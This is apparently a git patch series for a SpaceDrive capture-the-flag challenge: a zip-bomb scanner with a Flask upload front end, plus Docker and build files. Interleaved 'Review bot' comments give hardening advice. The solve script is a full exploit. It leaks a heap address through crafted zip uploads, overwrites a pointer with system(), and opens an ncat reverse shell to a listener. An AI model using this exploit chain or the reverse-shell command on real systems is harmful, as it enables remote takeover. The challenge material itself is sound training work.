z!~$A=#LO)YYLJ7|J_~615i^e%s2j=-+OH>2z|6-9TED>xO7sF8ASMGVXbF-a2T0z5 z6|@3LNURC8hMN@>Bf=b@b36kWI6#RW#AE{v)7UeBm4ntPf%)tVETHvA%p%O2K&8c6 z&{kql>ky)r9dv&oV>W}Jum&S2fiQq4g%}tFwYeA=SZw(!89)mRKvNN*#fFX`0vr`w zpw&jn)zB;s-cJaQ_obi$9JER#Ssuh>ni#?bMEY&^&j zvdSQ(%oA7Cg6A$}jX|zpp17cvF_A$YY%%l14YiC(4DwtcFECHsQp=dkAkPco?5Jf- zVUQPqaQ4(PrZUJ2LpTR&8Pgc##UPv`wT$Tu@{$nFiCV@C26-6>=S(eQCWE{@gma;m zF^fT73BtKj%UEK_Ag>DH-Kb?OF=CL{gz)avGUhVK>w-No@j)#E*iLZDuxDUk@lTPnero 
zURqv|QHWhYoPj|I>N*Yv24Q{%Zf*t!5f(;fK09u1Zckyb#oQo!MZr#DV_*;iGguiI z#6=m^!LF4+1PKF!Byxb*OM=`Y1uFTag&Cp#02?O*bsx7i*yHVtPzTC_rXc0?7|=t7 zfk7Uw0~{qF=Q~K$fE}Q~%?RQ$FesWZFmpiM>?sV24JA-`gOVz)*hF?MNCOKz`dFdi z!pFeC28k?okYS*(;DE&}C(L3lu*HgukmLd~h#L_opv1s~?0Q5*^YVfmtjG@02TEpq zNHGo$DSo(4a7e+DhyX061%(-zIk>s4z=kLafZQh}1~*la8DzUK)C{l#L8-x07!+Wz z@DpJLt4DIZC?u7MfrAZdvZpXFcQ!WzgE%OPBv?V|9&8>rB&a1JVF9vV3Nw{SLz0#Z zG*CgqtB3$%V30$O2S}=s2c;SX)KsG=j*^I!z@Z1tqYMnnyx^>%0-``csR~P=YEbWk zRl>4@I$RJOu8{np0T+a3D@ZU^fu^`IO9XgYVMca7DE3((g#{}{vS5P-03QPbJ4O(4 zAc6!GYp^l`*_R-Hal_If4=f$>VniTjGJ-@8Qpo_0ZctK$_z{wo1YyZa2om)ipyGoE z7WJ@n1Pw@7S`-1L2vKOzfzt#ijUgK=h9b#|u(b-DfyE)oO#+;h74@tX!PbJ)vLqxe zg9X58Sqf$pDAOpi!Q3DX6^0flFkuByB-#g%utsQjih}R&;P%gWU>=32~?& z;DQVc5(ptkiwI&q#1L?+1Qs!{5(H`)BJnUVNJD}Rl!_P_F#?SaC#24;--VL{DQ ztdKZnM#M3qJqT$|AlibEbOLJ&g5w1}!E<9IA|80`^J2ypAJnCwVHZex7eK8^1<^wb z60V562u|UUAcRDbFsRmHU|>)KjaV>nFsuX>U5t#s`FI&X2l|3|3?P;~Cur;xv@!xT z$uXIMfng7H?DsRc=fc3C3F`1L$}{ncf(D@(!9*}fEE+^)f%-`xE(>_bssem6J(DoRuSjmA&OT zs~E>RRxXZoR?Y=XDk7}x3pwsQ<@n4h#Sz8I!_mabp8kxZnPc6_C9JH>fhU+)85kM+ zz&&ja22f9t5nD*Hg9gGt`>{Zw1PU$CxB@72Kq18h3L#$5ustJ$00jgnT$n*&zyb;b z7ElLsmsER!uKfnNO^G zHmpL{tbF#Y95$?)3`{JHUaT@8%7&HChn0(giG`_*RTV@rm#48xfn>Z`ML|>vD;G0Q z1S_MhA*=2lRuL~&1sf2_ah;XN2V{wK6sx)ytG*X2*C$rpQdar3toEx}P4rpyOIU?; zS;aD0<-Az6ITTopy;#+ruyW|J@<*|mS%I#tmZDQqVWd+69Bvwt1 zW>$watk!E-xg%IbZCQEKSf$poicVnF&tO$dV--KaD%{M<)x^pPazGS_U{Vod6^mlk zea6b3#wx1E%HG5($l<`s+r-MgfK`*D1!0^l*f_CutSTI9S-ClcSXJ#=xk^|$TUaG` zvx;*Fu_~mq@^c8W%6NmURa0Q)Nn_>qVHE;7)^H)KavH1T30Bc&R-PtSZjj9o>(xY9 zC8Ai}pR;nNvMTC>;!iGuRm6ssvyoNnJ1c()t4s^4_yktN4EzRgK4aD5XalL|^kLGF zU}b005N8!&QjuWgNMjXfV`VR4m5E|iZDJMTcmlGVErQholmOV8S%nywSXek7v+{yy zdsY`o&IbN&+%)Hk?q0bk^D%%7KK1jm) zUl#$3ZE!S~urf2ZGD6}xl4CN54J+?cR(6gkRyHPAAy(EhRvu6|u`h)3eL#E>R`zmK zK36#_BgooFwkJ&742+DRWgDyv91NgSJbHLP+^Sb1AO=@gu6BUr^jer{sri)H1k z2PIhcC9DF>SrM$fC9JI5S=pJzY*-mp4Z$`wfn$y_f>jQpM+8LKu(JAqf|q9@t9S`0 znnWU4Ic-=uT3C5@gYp_EvY8E7*%+8um`hmsK~xi~Fo@a(P7lob5VzOL~s|Y 
zJcwt*Dhr|vSWQ4w6RSRi0t@Q1g6wB*ga~GU^Br>&L?v^j7sRbzFt>seN(3t-GiQV^ zB!LKV2(z+th_G^&vT{VRicVq`-USLqk;UK)DB{D)#qorda}tx92&>paRsjw>P(s%N zIlus%P?;xy%QfZ_2=4?q(K6eB%Rpv*h&SB9f{b3Q!pu2Mtm+(3Secn+PH;rBGIB(6 zeOBXAR{l?{>>NU@Vz#Vu91&m%Qx1KYsDv%60!JEHl(U(Y*^3oI zGBz_YGcYpNLn}MbDpaglixpPcfhssqg$J+XI6*_wj9>y(p)rB74-+VJF@tgr3n=HX zfHD$`J!k+NoQGgjWm2rn9O)oGvrS-CWMk40VddfQWmQRMm6*rMeS%fRmQ{kI3B(ex zW#!`#VrBO!EoJ2_&14mcVrBotDpktLdySPVgH2C13||M6e>efFlCp1da%h8$jukDG6e(7sS?1 zh#NR;AlyiZBRFipxtxi)Gy)b1%*=edz`^Zp2rY*|bq})vI8>RvSoJ_*wu_Y&M0v4- z+6>Gb>EK{s_F~lqiNYm8F~kh1w3xjhI(C5+tOa|Wc^0go0hcf~tc+E@tn6Pv34qN8 zaeG!l4m(yJ8&+l;R^BL9Wey=$*)&!zFIGM~R@M?$9s^ckFIKT#pjsbP z3o=H4oyh3LY6yyahw&vPyWdO7DV1P$8@u1Q+5q;4+7)09n4DE9W&N^!Q~V)2RH$-apFAD zX^GK`m8%160sC4|4Z&u}%Hs~sTegO*JRFLw%oA9p4L}jbY6FTOHZM@#C;_!(B3RWx z6k8Fv3S;tOWzJ${m2C@nL0O%PLdC%D4brGP;8f zE@0qb0Iglc8ZGdW5mYLIN=HQ0fNoo31QVe0kO|buVFs6n;8GAaA;T=o$gzu+^Es=) zJXWT8kP0~xQXz9hfKw1NBvUf40k^H0KYsOp%aK0yWe?4HBja;AG1*0UU@- zdSG2lAX!i_GwHEfg2H(Ms~Lm>7fgEKW+u~daBMP`u(F)~3<0d1UqD_2M|mXJI%Wf;mOjKr)5b_Fv>3B=1bkR}PFsAFyh7t+j3%0dufCM6+AG0+V1=5ADi!xojl zn^g=Xz+A>*!zutuDJ9IjCpgw3Ls05~)W3XdSp{~lg#cE@wf3x>9ObM`C7{N;z&uvP z5>{y&RK}8H- zB&*N_R?hjX{Q9iI6IglXvhuZ|i^ybv>T2GnAd-(mg;k^plok0RSVh;e3N*2bPGps9 zVioWrlOa8kmC1{h^99ID;3ixos|F}=O2Cx>^BPD#Oaps>c^)L)c%vx+^)Q*eAS#<6 zDoY?L^+%>kP_@I%T%iXJ3r0}1bIoI7VPIs8kIzp_i!Wg)&d4t+Q2?D`6z}ODUzD1d z5?@eK#E=WVLWm(gIU_MMk0CKRIkljKp*TM|JGF!%9;^qnzAQN>zc`hlI5{ydz9_Z0 zG^d0CWJpqJT6|JsaVkT6d~s%aMq*w{PHItn2}7{Ivv<6ozn_zjzq2<(PJUjx0+=X8 zI%l3CGcP_dB?Y8BIVUqUuLR6XEiOh<4{~gAMxv3aS$t_hN@7VW1K8Q18v_{PK{u1+ z<%8V;7ER4dVJJ>5DoZVbn^ar^(i5MSlbBu%awAA%Ji_T99r4MfMe)h`IiE}b;XHgsgSf#1i2x= zf*~GsqXq*c^o z#)IR@(;sXeH2Ofd2|+yJ;_Ms%)(*N}hoLwz9%@WH#HZkR2dCzE(0xA)Ntq>J!=3W; za~R<1F*zf#hyj`m!P4;snJMul3>hW)c{yORm?6Fl9AU78kXn&h!Vv7?2uhsJArTPA z1UNc-yM{1;Zc|9ifu%-}flx1J=4F;Z(sxRJX;Ka(J%dtaesXqBY97dQ;J7q2i!Xt> z2b34nQWzk&pD=)PvzZAbA_59z zQfXdkacYVYLvcw;Y7sPXIQ#g!Mz}gNq*jy^CB}p9jEIL^`xFn#7RBHq0-OlIncc-b 
z$k7)r7N41itPggL3REX3Vv`b+vr7vg38pwRy%-i&P|p@8#)FapB3Xh`8YGB=9K*p0 zt~@g(6`~02fMC}^XyE69$}x}~ki-KHoy@#=Q1XZ`VSwIp#E_B-%53paZZSi0QL?cS zLvl(6q+ChNO@(@wAt$l81eAE=OEPm)8LBc1Ao&ZFVHgr~GSl9Gwskfs2K*)S}|d{5*!d(%huf zqWJu@c<6;b49PjEiFpjkrA0-cN&(6Hplf~L;vn;2;gXV?mXlbL8lRDxn37rqzECC} z6r7Oo24{P4%>{KBIEITEa?^NTMvlV(lPfBW9 zVrfnZ*mTHkJvo^OR~0jW%>rHg!vL}$Y<@9ANfB5*Lr!X98Prdp=!1qB#3HCOT|AsU z7&7xpu!jc7Opu=#z}XSvv6PJD449umNdX@CMrck3y9$&OK?fXw^CwhW3Z$4x$t=!} zhlX`=Nn%k6s4ju#;9>@Fl?hHI4Ds=a#l@*bCGlyAnK=yc@c}`uAt90RZlQk8A)fwz z@$pcL!4^VmO9pU30j`E1CLv#v!~jmF(7*yEzWB_%B>#b1+{UYl~qYmVqS4teo-z1)=QocH$1^v zDSFA+)q-ztLR=7qT@lruS6HrfXjn$Q&Q7F3~-wT$^g}~dKnCvU=^9^d5Jk7iISqyp^tu17_P*Gu8E;p2aFMV#QddKL!IJ}ZzM zbiX5mFarYvHuZAg!;1wN7Jw9hG(a&(9}|NB!v!>PW2kxo5vW2a;}t#_A4_oh%tPC?Lq*HGBAMlHG<5ComUPOW&myTVPp_xc!8!Kw0|6%`?rAY6=G0; zp7aT`_ykNGw0N6=fdRDc8)OG)J1ZlD5CiNCPuSL=2T=8}13ST6Qy3T+K(!>`cY4?F1! z-Tkm*tMJHray{R%kT4?AWG=6=vVNPOWBI|~Ed{SKgA@mRtic7_1D`(XzLpt~P- zIsnZ53ZM<5SkgZ%JYjoOVeSFl{RWB`*hVUDP^2(0Fa!}W2ev&3W==L}r3Qll18n3R zw)X>OK5VNA_+T3b1_sd1OKjl=TIT_B4{YZF%zRLG!=`>ZXh#l%2!lij)Zs`JHuaz- z`-}|Y4Cv>X&McsOf#AbfptF<(nIsut_a4B+-is5!9dD%k#^Sx|BG{ozZ&;xJbr=pA5j0S5F#E-paD(GPEX02N0+N$)dQ9APeu z#RfX9f3rJfyD(F(03|lLdDT{cNas&(N9C^1dAgX3}wy% ziwiKIZ>-(|6-Te{_JYNsnvtk;IK&^aGBAMBA$s_{WyPLu+1ViF4{Sjd?9dGXsCcy* z#8TKEJXtmd2Iz?;5D6%`8ypjB0eoMFEc)|s3@@# zJT_O!kX8g57ELM5&8=jJk4NIggNMkFmBKr`pdkV17>5OD7z^uIGI+EF+-n671c8Qd zpraj-v0?b626DGcFB!Gd3+b&Pt3bbL8p}|Oo&l;M$lWc_*cynhmy@5In3I^3nOKaf z7}{4(X2@oUk9P}l^mUDQ^>c}jXNY%+^mFv}bY_T;clQg8clChEdbk8J#Jl_WJ30Eq z`@6XXyN1MvI6C>b#>1~w291w7xchiIIma968R?la6qJ^LMukwsK#CxPYw__pnMuj< z;Nhrv(7-obov{f+yl04SJR(Je_&S5qLkMWr3ERLm$h*+tE!dzQI1)fkD2AI0auYbV zK_LU~n1Tn9K;w1ssh}}X=%5)QA|bFbEFjta|=-9A+t@WLa=EE=u{qxWPE&j zZhjubJWyhdPbtoihfLl=W_Uqi2XaS2C0w5&C^`AZ7nh`D=EZ|1i(vjh3=-ynra&N( z4VhDhYX(IXG@wAkUholE(C|0^9JxA&QPP z@EjG2P<(uduQRM10p(y=iH?$gK}iWbCJ#+okh#?O_~eR2P}WM!$*f96F&5+oXkGw2 z3^a@kp3Oy31(^Uu6#@@Lq6jhQ6<6k#BqlNF6_*r2=nNPOJT_mzpqH0llB$=USE^S~ 
zlwXiqR8ol~1P*Q8%oM1Qqm!pDs2&3=2TxS%rBvn>SLQN+>5?J_uncU*2$>UK#GqG{ znv)1p2xS%IlrZRlf`>t`Ag4qxJ--CPC{9gg&?`x;C}Ge8Rcs7;Mfu?3N-s47T9sv_ z6fwYg5HldvA4CU?ol=>Xn46i*pa;>OR9wuU2b~mQ&`U{8Dou}1EK1BvPc4RVGxO5& zVeG`Dq@vU^7%wL?FBQfv26+^sA0!+P;v+Q_$Yg@<*#mXWL06iCjF14W(PLm>fYHz+ zkwH>m3{nebKnYO4mK{7c2N3|BpATZeXy`#BAR#b@wO_y-1_lODa|&612Go8S4Lc$O zrXJS*hw(i@htnY04;z1k(dd17bp4JMF#BQm6~buP{e&R3APh1CM8j|)=*%=E z_rvb{gVE573>aYUhuH(8K}R(FL(&hsPY_0fPA&o2h3{Hj~_F@;}_PSgwfBT<4<7Cpv#b83@8mc2?S&X%>A(O9vBU~rxU6i zG@Jlqg6X4B`(g3V0PUy4X+E$rIDsA>;2Uv}@(%-Sd=N^5#y8=bp=kw~e;dty2heRF z3=9k~`VLxz!_p7TjHjT(|3D{0K?Pvr|1Ur%rGrjzfr`T@n0^@j5p-}Nl785H!v`Yu z{{@{~j-($pZu$eNA2hBBvKy5DKs3x=SUOk@^*^W#0m;MeCw&nI;xRCQ4xE9oAS6sb zj0T-|28w@}e)#xi0z^Hm{Dbf?y0Z+RGi5+#!SuuWsRmH}Fn7ZAqsPA>c>I@v0o@*$ ze&~sFFzvA6YB&wLJqqN0xB@668frgiydEk9rqI=bmPVtCffQDQ3U&qthDo4}ryv0+ zMptVJbw5-ZPVqty0+fUe_(NsT^*iIxuLin4kAZ=q23j6KwZr`l@+`-)Bfms1cGpe61Q7KB9C4*+NF BY9Rms literal 0 HcmV?d00001 diff --git a/flag.txt b/flag.txt new file mode 100644 index 0000000..b1cd7ba --- /dev/null +++ b/flag.txt @@ -0,0 +1 @@ +THCon{Coucou} \ No newline at end of file diff --git a/CMakeLists.txt b/src/mineziper/CMakeLists.txt similarity index 100% rename from CMakeLists.txt rename to src/mineziper/CMakeLists.txt diff --git a/src/mineziper/README.md b/src/mineziper/README.md new file mode 100644 index 0000000..8b01e2c --- /dev/null +++ b/src/mineziper/README.md @@ -0,0 +1,4 @@ +# mineziper 💣 +### A Minesweeper for zip files! + +Detect zip bombs based on overlapping files. diff --git a/libmineziper/CMakeLists.txt b/src/mineziper/libmineziper/CMakeLists.txt similarity index 100% rename from libmineziper/CMakeLists.txt rename to src/mineziper/libmineziper/CMakeLists.txt diff --git a/libmineziper/include/libmineziper.h b/src/mineziper/libmineziper/include/libmineziper.h similarity index 100% rename from libmineziper/include/libmineziper.h rename to src/mineziper/libmineziper/include/libmineziper.h 
diff --git a/libmineziper/include/libmineziper_bitstream.h b/src/mineziper/libmineziper/include/libmineziper_bitstream.h
similarity index 100%
rename from libmineziper/include/libmineziper_bitstream.h
rename to src/mineziper/libmineziper/include/libmineziper_bitstream.h
diff --git a/libmineziper/include/libmineziper_crypto.h b/src/mineziper/libmineziper/include/libmineziper_crypto.h
similarity index 100%
rename from libmineziper/include/libmineziper_crypto.h
rename to src/mineziper/libmineziper/include/libmineziper_crypto.h
diff --git a/libmineziper/include/libmineziper_huffman_tree.h b/src/mineziper/libmineziper/include/libmineziper_huffman_tree.h
similarity index 100%
rename from libmineziper/include/libmineziper_huffman_tree.h
rename to src/mineziper/libmineziper/include/libmineziper_huffman_tree.h
diff --git a/libmineziper/include/libmineziper_zip.h b/src/mineziper/libmineziper/include/libmineziper_zip.h
similarity index 100%
rename from libmineziper/include/libmineziper_zip.h
rename to src/mineziper/libmineziper/include/libmineziper_zip.h
diff --git a/libmineziper/src/libmineziper.c b/src/mineziper/libmineziper/src/libmineziper.c
similarity index 100%
rename from libmineziper/src/libmineziper.c
rename to src/mineziper/libmineziper/src/libmineziper.c
diff --git a/libmineziper/src/libmineziper_bitstream.c b/src/mineziper/libmineziper/src/libmineziper_bitstream.c
similarity index 100%
rename from libmineziper/src/libmineziper_bitstream.c
rename to src/mineziper/libmineziper/src/libmineziper_bitstream.c
diff --git a/libmineziper/src/libmineziper_crypto.c b/src/mineziper/libmineziper/src/libmineziper_crypto.c
similarity index 100%
rename from libmineziper/src/libmineziper_crypto.c
rename to src/mineziper/libmineziper/src/libmineziper_crypto.c
diff --git a/libmineziper/src/libmineziper_huffman_tree.c b/src/mineziper/libmineziper/src/libmineziper_huffman_tree.c
similarity index 100%
rename from libmineziper/src/libmineziper_huffman_tree.c
rename to src/mineziper/libmineziper/src/libmineziper_huffman_tree.c
diff --git a/libmineziper/src/libmineziper_zip.c b/src/mineziper/libmineziper/src/libmineziper_zip.c
similarity index 100%
rename from libmineziper/src/libmineziper_zip.c
rename to src/mineziper/libmineziper/src/libmineziper_zip.c
diff --git a/mineziper/CMakeLists.txt b/src/mineziper/mineziper/CMakeLists.txt
similarity index 100%
rename from mineziper/CMakeLists.txt
rename to src/mineziper/mineziper/CMakeLists.txt
diff --git a/mineziper/mineziper.c b/src/mineziper/mineziper/mineziper.c
similarity index 100%
rename from mineziper/mineziper.c
rename to src/mineziper/mineziper/mineziper.c
diff --git a/mineziper/mineziperd.c b/src/mineziper/mineziper/mineziperd.c
similarity index 100%
rename from mineziper/mineziperd.c
rename to src/mineziper/mineziper/mineziperd.c
diff --git a/tests/CMakeLists.txt b/src/mineziper/tests/CMakeLists.txt
similarity index 100%
rename from tests/CMakeLists.txt
rename to src/mineziper/tests/CMakeLists.txt
diff --git a/tests/test_decode_fixed_tree.c b/src/mineziper/tests/test_decode_fixed_tree.c
similarity index 100%
rename from tests/test_decode_fixed_tree.c
rename to src/mineziper/tests/test_decode_fixed_tree.c
diff --git a/tests/test_decode_huffman_tree.c b/src/mineziper/tests/test_decode_huffman_tree.c
similarity index 100%
rename from tests/test_decode_huffman_tree.c
rename to src/mineziper/tests/test_decode_huffman_tree.c
diff --git a/tests/test_get_cdh.c b/src/mineziper/tests/test_get_cdh.c
similarity index 100%
rename from tests/test_get_cdh.c
rename to src/mineziper/tests/test_get_cdh.c
diff --git a/webapp/app.py b/src/webapp/app.py
similarity index 100%
rename from webapp/app.py
rename to src/webapp/app.py
diff --git a/webapp/static/space.jpg b/src/webapp/static/space.jpg similarity index 100% rename from webapp/static/space.jpg rename to src/webapp/static/space.jpg diff --git a/webapp/static/styles.css b/src/webapp/static/styles.css similarity index 100% rename from webapp/static/styles.css rename to src/webapp/static/styles.css diff --git a/webapp/templates/index.html b/src/webapp/templates/index.html similarity index 100% rename from webapp/templates/index.html rename to src/webapp/templates/index.html From 00bf8c434958520b6d917e057c083746e8ceeeb8 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:18:31 +0100 Subject: [PATCH 02/10] Add requirements.txt --- src/webapp/app.py | 2 +- src/webapp/requirements.txt | 7 +++++++ 2 files changed, 8 insertions(+), 1 deletion(-) create mode 100644 src/webapp/requirements.txt diff --git a/src/webapp/app.py b/src/webapp/app.py index 5ae934b..829ba31 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -56,4 +56,4 @@ def upload(): return message if __name__ == '__main__': - app.run(debug=True) + app.run(debug=False) diff --git a/src/webapp/requirements.txt b/src/webapp/requirements.txt new file mode 100644 index 0000000..6b95995 --- /dev/null +++ b/src/webapp/requirements.txt @@ -0,0 +1,7 @@ +blinker==1.7.0 +click==8.1.7 +Flask==3.0.2 +itsdangerous==2.1.2 +Jinja2==3.1.3 +MarkupSafe==2.1.5 +Werkzeug==3.0.1 From bed22b2bf53a97434396370f6b7add6b67d13d26 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:18:37 +0100 Subject: [PATCH 03/10] Add build script --- build.sh | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 build.sh diff --git a/build.sh b/build.sh new file mode 100644 index 0000000..865e125 --- /dev/null +++ b/build.sh 
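Review bot: `app.run(debug=False)` in src/webapp/app.py still serves the upload endpoint from Flask's built-in development server, and with no `host` argument that server listens on 127.0.0.1 only, so under the Dockerfile's `python3 app.py` entrypoint the port would not be reachable from outside the container. Turning the debugger off is the right default; for the deployed image I would put the app behind a WSGI server listed in requirements.txt, or at minimum pass the bind address explicitly, e.g. `app.run(host="0.0.0.0", debug=False)`. The rest of app.py lies outside this hunk, so whether uploads are size-limited before they are processed cannot be checked from here.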
@@ -0,0 +1,13 @@ +echo "Building project and update sources in dist/" + +cd src/mineziper/ +mkdir build +cd build +cmake .. && make +cp bin/mineziperd ../../../dist +cd .. +rm -rf build +cd ../.. + +echo "Adding source backup to dist/" +zip -r dist/src.zip src \ No newline at end of file From 11c94b739dc99cd127f31434204280f80dc43750 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:21:01 +0100 Subject: [PATCH 04/10] Add missing import --- src/mineziper/libmineziper/src/libmineziper_bitstream.c | 1 + 1 file changed, 1 insertion(+) diff --git a/src/mineziper/libmineziper/src/libmineziper_bitstream.c b/src/mineziper/libmineziper/src/libmineziper_bitstream.c index 3cab8cb..d25b279 100644 --- a/src/mineziper/libmineziper/src/libmineziper_bitstream.c +++ b/src/mineziper/libmineziper/src/libmineziper_bitstream.c @@ -1,6 +1,7 @@ #include "libmineziper_bitstream.h" #include +#include unsigned int get_bits(bitstream* bs, unsigned int bit_num) { From 4c2d51b4c63c2de9fd8732fa00ba2d9d6e0e7873 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:21:22 +0100 Subject: [PATCH 05/10] Add full solve --- solve/solve.py | 134 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 134 insertions(+) create mode 100644 solve/solve.py diff --git a/solve/solve.py b/solve/solve.py new file mode 100644 index 0000000..01a091c --- /dev/null +++ b/solve/solve.py 
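Review bot: build.sh has no shebang and no error handling, so a failed `cd src/mineziper/` or `cd build` lets the later `cp` and `rm -rf build` run from whatever directory the script happens to be in. A failed `cmake .. && make` also leaves the previously committed dist/mineziperd in place while the script carries on and writes dist/src.zip, so the shipped binary and the source archive can silently drift apart. I would start the script with `#!/usr/bin/env bash` and `set -euo pipefail`, and use `mkdir -p build` so a leftover directory from an aborted run does not stop it. The file is added with mode 100644, so it has to be invoked as `bash build.sh` unless the mode is changed.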
@@ -0,0 +1,134 @@ +import requests +import struct +import zipfile + + +############## +# PARAMETERS # +############## + +# Victim params +ip = "127.0.0.1" +port = 5000 +url = f"http://{ip}:{port}/upload" + +# Reverse shell params +ip = "127.0.0.1" +my_port = 9001 + + +############# +# LEAK ASLR # +############# + +guess = 0 +leak = b"" + +size_chunk = 0x20 +off_data = size_chunk * 2 + +stored_block_lfh = b'PK\x03\x04\n\x00\x00\x00\x00\x00\xd2\xbb[X\xday\xa1\xa7\x04\x00\x00\x00\x04\x00\x00\x00\x05\x00\x1c\x00dummyUT\t\x00\x03\x8cb\xdee\x8cb\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x009\t\xb4\x13' +stored_block_cd = b'PK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00\xd2\xbb[X\xday\xa1\xa7\x04\x00\x00\x00\x04\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\x00\x00\x00\x00dummyUT\x05\x00\x03\x8cb\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00' + +cd = b"PK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00C\x8a[X\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00%b\x18\x00%b\x00\x00\x00\x00\x00\x00\xa4\x81%blinpeas.shUT\x05\x00\x03>\x0b\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00" +eocd = b"PK\x05\x06\x00\x00\x00\x00\x80\x00%b%b%b\x00\x00" + +lencd = len(cd % (b"00", b"00", b"0000")) +leneocd = len(eocd % (b"00", b'0000', b'0000')) + +totsize = len(stored_block_lfh) +totsize += len(stored_block_cd) +totsize += lencd +totsize += leneocd +totsize += 8 # metadata of heap chunk +while totsize & 0xf != 0: + totsize += 1 + +off_data += totsize # offset to the beg of "data" +off_data -= 0x18 # ajust to the beg of data.filename + +print(f"{hex(size_chunk)=}\n{hex(off_data)=}") + +for _ in range(8): + off_data += 1 + + for guess in range(0x100): + # Add a classical stored block to put the free address on the heap + zip = stored_block_lfh + zip += stored_block_cd + + # generate payload for the size and inject malicious cdh + payload = (guess << 8) + if len(leak): + payload += leak[0] + + comp = (0x1000a - payload) % 0x10000 + zip += cd % 
(struct.pack("H", payload), struct.pack("H", comp), struct.pack("I", off_data)) + + # Add EOCD + zip += eocd % ( + struct.pack("H", 2), + struct.pack("I", lencd + len(stored_block_cd)), + struct.pack("I", len(stored_block_lfh)) + ) + + x = requests.post(url, files={'file': zip}) + if "Error" not in x.text: + print("Found correct guess:", hex(guess)) + leak = guess.to_bytes(1, "big") + leak + + print(leak) + +leak_i = 0 +for i in range(8): + leak_i += leak[7-i] << (i*8) + +print(hex(leak_i)) + + +####################### +# Craft malicious zip # +####################### + +l = 96 +offset = -0x54670 +free = leak_i + +system = struct.pack("Q", free + offset) +command = b"ncat %b %b -e /bin/bash\x00" % (my_ip.encode(), str(my_port).encode()) + +payload = command + b"a" * (l - len(command)) + b"\x00"*4 + system + +with zipfile.ZipFile("payload.zip", "w", zipfile.ZIP_DEFLATED) as zipf: + with zipf.open("payload.txt", "w") as f: + f.write(payload) + f.close() + + for i in range(1, 8): + with zipf.open(f"dummy{str(i)}.txt", "w") as f: + f.write(b"dummy") + f.close() + + zipf.close() + +zip = b"" +with open("payload.zip", "rb") as zipf: + zip = zipf.read() + zipf.close() + +off = zip.find(bytes([len(payload)])) +print("Offset of payload size: " + hex(off)) + +zip = zip[:off] + b"\x24" + zip[off+1:] + +with open("payload.zip", "wb") as zipf: + zipf.write(zip) + zipf.close() + +print("payload.zip patched") +print("You can start listening on port ", str(my_port)) +input("Press any key when you are ready...") +print("Sending payload...") + +x = requests.post(url, files={'file': zip}) +print(x.text) \ No newline at end of file From a5899768f7f63db860b02e3a8e92931727ea3fa3 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 12:46:58 +0100 Subject: [PATCH 06/10] Update dockerfile --- Dockerfile | 12 +++++++----- README.md | 8 ++++++++ 2 files changed, 15 insertions(+), 5 deletions(-) diff --git a/Dockerfile b/Dockerfile index 06d79ba..ddea988 100644 --- a/Dockerfile 
+++ b/Dockerfile @@ -1,20 +1,22 @@ FROM ubuntu:22.04 -RUN apt-get update +RUN apt update && apt install python3-pip ncat -y RUN useradd -m -s /bin/bash user -USER user +# USER user WORKDIR /home/user COPY dist/mineziperd . -COPY webapp . +COPY src/webapp webapp COPY flag.txt . RUN ./mineziperd & WORKDIR /home/user/webapp + RUN pip install -r requirements.txt -ENTRYPOINT [ "python3" ] -CMD [ "app.py" ] +EXPOSE 5000 +ENV FLASK_APP=app.py +CMD ["flask", "run", "--host", "0.0.0.0"] diff --git a/README.md b/README.md index e69de29..02ea339 100644 --- a/README.md +++ b/README.md @@ -0,0 +1,8 @@ +# SpaceDrive + +## Deploy chall + +```bash +sudo docker build -t chall . +sudo docker run --rm -p 5000:5000 -it chall +``` \ No newline at end of file From 1aa057348250c8b7c292679373a9d411f7d47eab Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 12:47:17 +0100 Subject: [PATCH 07/10] Improve webapp style --- src/webapp/app.py | 12 ++- src/webapp/static/styles.css | 97 ++++++++++++++++++++----- src/webapp/templates/index.html | 34 +++++---- src/webapp/templates/upload_status.html | 17 +++++ 4 files changed, 123 insertions(+), 37 deletions(-) create mode 100644 src/webapp/templates/upload_status.html diff --git a/src/webapp/app.py b/src/webapp/app.py index 829ba31..056b788 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -17,10 +17,11 @@ def index(): @app.route('/upload', methods=['POST']) def upload(): if 'file' not in request.files: - return 'No file part' + return render_template('upload_status.html', message='No file part', success=False) + file = request.files['file'] if file.filename == '': - return 'No selected file' + return render_template('upload_status.html', message='No selected file', success=False) buf = file.read() hash = hashlib.sha256(buf).digest() 
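Review bot: Commenting out `USER user` means every later build step and the final `flask run` process execute as root, so a bug in the upload handler or in `mineziperd` yields root inside the container; the line should stay active, placed after the package install. `RUN ./mineziperd &` only starts the daemon inside a throwaway build container, so nothing is listening on the scanner port when the image actually runs. The package step would be more reproducible and smaller as `RUN apt-get update && apt-get install -y --no-install-recommends python3-pip ncat && rm -rf /var/lib/apt/lists/*`.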
@@ -44,16 +45,19 @@ def upload(): elif (status == 1): message = "Error: Potential virus found, cannot upload." + success = False else: message = 'File successfully uploaded' files.append({'filename': file.filename, 'content':buf}) + success = True except: message = 'Error: Failed to scan file' + success = False s.close() - return message + return render_template('upload_status.html', message=message, success=success) if __name__ == '__main__': - app.run(debug=False) + app.run(debug=True) diff --git a/src/webapp/static/styles.css b/src/webapp/static/styles.css index dc38ef5..bfad1c0 100644 --- a/src/webapp/static/styles.css +++ b/src/webapp/static/styles.css 
